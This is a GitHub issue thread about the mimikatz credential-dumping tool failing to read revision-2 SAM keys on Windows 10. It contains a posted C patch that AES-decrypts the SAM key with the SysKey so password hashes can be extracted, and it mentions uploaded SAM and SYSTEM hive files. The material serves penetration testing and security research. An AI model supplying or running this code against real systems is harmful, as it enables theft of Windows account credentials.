kuhl_m_lsadump_getSamKey fails for pDomAccF->keys1.Revision==2 #99

Open
uriyay opened this Issue Sep 11, 2017 · 6 comments

uriyay commented Sep 11, 2017

When I run lsadump::sam on my Windows 10 x64, I get this error:
Unknow Classic Struct Key revision (2)
I found that the error comes from here:

else PRINT_ERROR(L"Unknow Classic Struct Key revision (%u)", pDomAccF->keys1.Revision);

Do you plan to support this revision?

gentilkiwi (Owner) commented Oct 18, 2017

Hello :)
I never saw this kind of revision. Do not hesitate to send me files to reproduce!
https://github.com/gentilkiwi/mimikatz/wiki/howto-~-open-an-issue#give-me-files

TheTrollCaptain commented Mar 15, 2018

@gentilkiwi Hello!
I got that error too. Console spits out:
"SAMKey : ERROR kuhl_m_lsadump_getSamKey ; Unknow Classic Struct Key revision (2)
ERROR kuhl_m_lsadump_getUsersAndSamKey ; kuhl_m_lsadump_getSamKey KO"

If you're interested, which files would you need to see?

EDIT: It seems to be the SAM file throwing the error... this is the SAM file I extracted from my Windows 10 Enterprise machine
SAM.zip
and SYSTEM file
SYSTEM.zip

uriyay commented Mar 24, 2018

Solved it by adding handling for revision 2 in kuhl_m_lsadump_getSamKey:

case 2:
	if(pDomAccF->keys1.Revision == 1)
	{
		/* Revision 1: classic RC4 key derived with MD5 over salt, constants and SysKey */
		MD5Init(&md5ctx);
		MD5Update(&md5ctx, pDomAccF->keys1.Salt, SAM_KEY_DATA_SALT_LENGTH);
		MD5Update(&md5ctx, kuhl_m_lsadump_qwertyuiopazxc, sizeof(kuhl_m_lsadump_qwertyuiopazxc));
		MD5Update(&md5ctx, sysKey, SYSKEY_LENGTH);
		MD5Update(&md5ctx, kuhl_m_lsadump_01234567890123, sizeof(kuhl_m_lsadump_01234567890123));
		MD5Final(&md5ctx);
		RtlCopyMemory(samKey, pDomAccF->keys1.Key, SAM_KEY_DATA_KEY_LENGTH);
		if(!(status = NT_SUCCESS(RtlEncryptDecryptRC4(&data, &key))))
			PRINT_ERROR(L"RtlEncryptDecryptRC4 KO");
	}
	else if(pDomAccF->keys1.Revision == 2)
	{
		/* Revision 2: key data is AES-128 encrypted under the SysKey; the output must be exactly one key long */
		pAesKey = (PSAM_KEY_DATA_AES)&pDomAccF->keys1;
		if(kull_m_crypto_genericAES128Decrypt(sysKey, pAesKey->Salt, pAesKey->data, pAesKey->DataLen, &out, &len))
		{
			if(status = (len == SAM_KEY_DATA_KEY_LENGTH))
				RtlCopyMemory(samKey, out, SAM_KEY_DATA_KEY_LENGTH);
			LocalFree(out);
		}
	}
TylerD89 commented Mar 26, 2018

Thanks man! Put that to good use!

0xVIC commented Nov 16, 2018

Thank you, very useful!

afernandezb92 commented Nov 16, 2018

Thanks so much, it works!!!
